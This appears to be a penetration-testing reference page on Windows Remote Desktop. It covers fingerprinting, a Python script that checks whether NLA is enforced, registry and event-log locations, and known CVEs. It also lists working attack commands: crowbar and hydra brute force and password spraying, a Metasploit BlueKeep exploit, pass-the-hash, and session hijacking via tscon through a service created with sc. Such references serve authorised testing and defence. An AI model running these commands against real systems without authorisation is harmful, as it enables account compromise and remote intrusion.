RDP
RDP, Remote Desktop, Terminal Services
Remote Desktop Protocol (RDP) provides interactive GUI access to Windows hosts over TCP 3389. The recurring issues are unpatched pre-authentication bugs (BlueKeep, CVE-2019-0708), credential brute force and password spraying against exposed logon screens, and servers that do not enforce Network Level Authentication (NLA), which leaves the logon screen and the pre-auth protocol surface reachable by anyone who can connect.
Ports
| Port | Protocol | Description |
|---|---|---|
| 3389 | tcp | RDP (TPKT / X.224, then RDP security, TLS or CredSSP) |
| 3389 | udp | RDP UDP transport (RDP 8.0+, Windows 8 / Server 2012 and later); only used alongside the TCP connection |
Fingerprints
| Banner / Probe | Expected Response |
|---|---|
| nmap -sV -p <port> <target> | Service identified as ms-wbt-server; version detail is sparse because RDP sends no text banner |
| nmap -p <port> --script rdp-enum-encryption,rdp-ntlm-info <target> | Supported security layers (RDP / TLS / CredSSP) and, from the NTLM challenge, NetBIOS and DNS names, domain and OS build |
| nc -nv <target> <port> | Connection opens but nothing is returned: the server waits for an X.224 Connection Request, so a raw grab shows no banner |
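The security-layer check above can be done by hand with a few packets. The following is an added example, not code from the original page: it builds the TPKT + X.224 Connection Request that every RDP client sends first, asks for standard RDP security only, and reads the server's RDP Negotiation Response or Failure. A server that insists on CredSSP answers with failure code HYBRID_REQUIRED_BY_SERVER, which is how `rdp-enum-encryption` and `rdp-sec-check.pl` conclude that NLA is enforced. The sample replies are constructed inline so the script runs offline; pass a host (and optionally a port) on the command line to probe a live listener.

```python
"""Check whether an RDP listener enforces NLA by inspecting its X.224 negotiation reply."""
import socket
import struct
import sys

# requestedProtocols / selectedProtocol flags (MS-RDPBCGR 2.2.1.1.1 / 2.2.1.2.1)
PROTOCOL_RDP = 0x00000000       # standard RDP security (no TLS, no NLA)
PROTOCOL_SSL = 0x00000001       # TLS
PROTOCOL_HYBRID = 0x00000002    # CredSSP, i.e. NLA
PROTOCOL_RDSTLS = 0x00000004
PROTOCOL_HYBRID_EX = 0x00000008

TYPE_RDP_NEG_REQ = 0x01
TYPE_RDP_NEG_RSP = 0x02
TYPE_RDP_NEG_FAILURE = 0x03

# failureCode values of the RDP Negotiation Failure structure (MS-RDPBCGR 2.2.1.2.2)
FAILURE_CODES = {
    1: "SSL_REQUIRED_BY_SERVER",
    2: "SSL_NOT_ALLOWED_BY_SERVER",
    3: "SSL_CERT_NOT_ON_SERVER",
    4: "INCONSISTENT_FLAGS",
    5: "HYBRID_REQUIRED_BY_SERVER",
    6: "SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER",
}


def build_connection_request(requested_protocols: int) -> bytes:
    """TPKT + X.224 Connection Request carrying an RDP Negotiation Request."""
    neg_req = struct.pack("<BBHI", TYPE_RDP_NEG_REQ, 0, 8, requested_protocols)
    # X.224 CR TPDU: code 0xE0, DST-REF, SRC-REF, class 0, then rdpNegReq
    x224 = struct.pack(">BHHB", 0xE0, 0, 0, 0) + neg_req
    x224 = struct.pack("B", len(x224)) + x224               # LI counts the bytes after itself
    return struct.pack(">BBH", 3, 0, 4 + len(x224)) + x224  # TPKT: version 3, reserved, length


def parse_connection_confirm(data: bytes) -> dict:
    """Parse TPKT + X.224 Connection Confirm and return the negotiation outcome."""
    if len(data) < 11 or data[0] != 3:
        raise ValueError("not a TPKT packet")
    if struct.unpack(">H", data[2:4])[0] != len(data):
        raise ValueError("TPKT length does not match packet size")
    li = data[4]
    if data[5] != 0xD0:
        raise ValueError("not an X.224 Connection Confirm")
    body = data[11:5 + li]   # optional rdpNegData after the 6-byte fixed part of the CC
    if not body:
        # Pre-Vista servers answer without rdpNegData: only standard RDP security exists
        return {"negotiation": False, "selected_protocol": PROTOCOL_RDP, "failure": None}
    if len(body) < 8:
        raise ValueError("truncated rdpNegData")
    rtype, _flags, _length, payload = struct.unpack("<BBHI", body[:8])
    if rtype == TYPE_RDP_NEG_RSP:
        return {"negotiation": True, "selected_protocol": payload, "failure": None}
    if rtype == TYPE_RDP_NEG_FAILURE:
        return {"negotiation": True, "selected_protocol": None,
                "failure": FAILURE_CODES.get(payload, f"UNKNOWN_{payload}")}
    raise ValueError(f"unexpected rdpNegData type {rtype:#x}")


def assess(result: dict) -> str:
    """Interpret the reply to a request that offered PROTOCOL_RDP only."""
    if not result["negotiation"]:
        return "legacy server: no negotiation, standard RDP security only"
    failure = result["failure"]
    if failure in ("HYBRID_REQUIRED_BY_SERVER", "SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER"):
        return "NLA enforced"
    if failure == "SSL_REQUIRED_BY_SERVER":
        return "TLS required but NLA not enforced"
    if failure:
        return f"negotiation failed: {failure}"
    return "standard RDP security accepted: no NLA, no TLS"


def probe(host: str, port: int = 3389, timeout: float = 5.0) -> dict:
    """Send the request to a live host and parse its reply."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_connection_request(PROTOCOL_RDP))
        return parse_connection_confirm(sock.recv(1024))


def _confirm(neg_data: bytes) -> bytes:
    """Build a Connection Confirm for the constructed samples below."""
    x224 = struct.pack(">BHHB", 0xD0, 0, 0x1234, 0) + neg_data
    x224 = struct.pack("B", len(x224)) + x224
    return struct.pack(">BBH", 3, 0, 4 + len(x224)) + x224


# Constructed sample replies (not captured from a real host)
SAMPLE_NLA_REQUIRED = _confirm(struct.pack("<BBHI", TYPE_RDP_NEG_FAILURE, 0, 8, 5))
SAMPLE_RDP_ACCEPTED = _confirm(struct.pack("<BBHI", TYPE_RDP_NEG_RSP, 0, 8, PROTOCOL_RDP))
SAMPLE_LEGACY = _confirm(b"")

if __name__ == "__main__":
    if len(sys.argv) > 1:
        port = int(sys.argv[2]) if len(sys.argv) > 2 else 3389
        print(f"{sys.argv[1]}:{port} -> {assess(probe(sys.argv[1], port))}")
    else:
        for name, sample in (("NLA required", SAMPLE_NLA_REQUIRED),
                             ("RDP accepted", SAMPLE_RDP_ACCEPTED),
                             ("legacy", SAMPLE_LEGACY)):
            print(f"{name}: {assess(parse_connection_confirm(sample))}")
```

"NLA enforced" means the pre-auth surface (the logon screen, and the channel negotiation that BlueKeep abuses) is only reachable after CredSSP authentication; it does not stop password guessing, since tools such as crowbar and hydra authenticate through CredSSP. A server that accepts PROTOCOL_RDP outright is also exposing the weak legacy encryption layer, so flag both outcomes.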
Key Files
RDP is configured in the registry and leaves its traces in the Windows event logs; the Linux paths that often appear in generic templates do not apply here.
| Path | Description |
|---|---|
| HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections | 0 = RDP enabled, 1 = disabled |
| HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\UserAuthentication | 1 = NLA required, 0 = logon screen reachable before authentication |
| HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\SecurityLayer | 0 = RDP security, 1 = negotiate, 2 = TLS |
| HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber | Listening port (default 3389) |
| HKCU\Software\Microsoft\Terminal Server Client\Servers | Client-side history of hosts connected to, with UsernameHint per host |
| %SystemRoot%\System32\winevt\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx | Session logon (21), disconnect (24) and reconnect (25) events with source IP |
| %SystemRoot%\System32\winevt\Logs\Security.evtx | 4624 with Logon Type 10 (RemoteInteractive), 4625 failed logons, 4778/4779 session reconnect and disconnect |
Default Credentials
RDP has no vendor default accounts. The usual targets are the built-in local `Administrator` (RID 500), which has historically been exempt from account lockout, and reused or seasonal domain passwords.
| Username | Password | Context |
|---|---|---|
| Administrator | (set at install, often weak or reused) | Built-in local admin; cannot be renamed away from RID 500, so it is the default brute-force target |
Known CVEs
| Identifier | Type | Description |
|---|---|---|
| CVE-2019-0708 | RCE | BlueKeep: pre-auth use-after-free in the MS_T120 virtual channel; wormable; XP, Vista, 7, Server 2003, 2008 and 2008 R2 |
| CVE-2019-1181 / CVE-2019-1182 | RCE | DejaBlue: pre-auth RCE in Remote Desktop Services; Windows 7 through 10 and Server 2008 R2 through 2019 |
| CVE-2012-0002 | RCE / DoS | MS12-020: use-after-free in RDP connection handling; public exploits mostly crash the host |
| CVE-2020-0609 / CVE-2020-0610 | RCE | BlueGate: pre-auth RCE in RD Gateway over UDP 3391; Server 2012 through 2019 |
Exploitation Primitives
| Technique | Tool / Command | Result |
|---|---|---|
| Brute force (one user, many passwords) | crowbar -b rdp -s <target>/32 -u administrator -C pass.txt | Password guessing against a single account; check the lockout policy first |
| Password spray (many users, one password) | crowbar -b rdp -s <target>/32 -U users.txt -c 'Winter2024!' | One attempt per account, stays under lockout thresholds |
| Brute force (hydra) | hydra -l administrator -P pass.txt rdp://<target> | Same as crowbar; keep threads low (-t 1) or the server drops connections |
| BlueKeep check | msfconsole -q -x "use auxiliary/scanner/rdp/cve_2019_0708_bluekeep; set RHOSTS <target>; run" | Reports vulnerable / patched without exploiting |
| BlueKeep exploit | msfconsole -q -x "use exploit/windows/rdp/cve_2019_0708_bluekeep; set RHOSTS <target>; set TARGET <n>; run" | Pre-auth RCE as SYSTEM; a wrong TARGET crashes the host |
| Interactive logon | xfreerdp /v:<target> /u:<user> /p:<pass> | GUI session with recovered credentials |
| Pass the hash | xfreerdp /v:<target> /u:<user> /pth:<NTLM hash> | Only works when Restricted Admin mode is enabled on the target |
Notes
BlueKeep (CVE-2019-0708) affects unpatched Windows XP, Vista, 7, Server 2003, 2008 and 2008 R2; Windows 8 and later are not vulnerable. Check the OS build first (`rdp-ntlm-info` returns it even when NLA is on) and choose the matching Metasploit TARGET, because a wrong target or an unexpected memory layout gives a BSOD rather than a shell. NLA is a partial mitigation: the vulnerable channel is only reached after CredSSP authentication.
RDP session hijacking via `tscon` requires SYSTEM: `query user` lists sessions with their ID, SESSIONNAME and state, then `tscon <ID> /dest:<your session>` attaches the target session to yours without the victim's password (`/dest:console` from the physical console, `/dest:rdp-tcp#N` from your own RDP session). Disconnected (Disc) sessions are the usual targets. A common route to SYSTEM is a throwaway service: `sc create sesshijack binpath= "cmd.exe /k tscon <ID> /dest:rdp-tcp#0"` followed by `net start sesshijack`. On the defensive side the reconnect shows up as Security event 4778 and LocalSessionManager event 25 without a matching 4624.
Tools: `crowbar`, `hydra`, Metasploit `cve_2019_0708_bluekeep` scanner and exploit modules, `rdp-sec-check.pl`, nmap `rdp-enum-encryption` / `rdp-ntlm-info` / `rdp-vuln-ms12-020`, `xfreerdp`.
Seen on
Shodan, Censys, FOFA, ZoomEye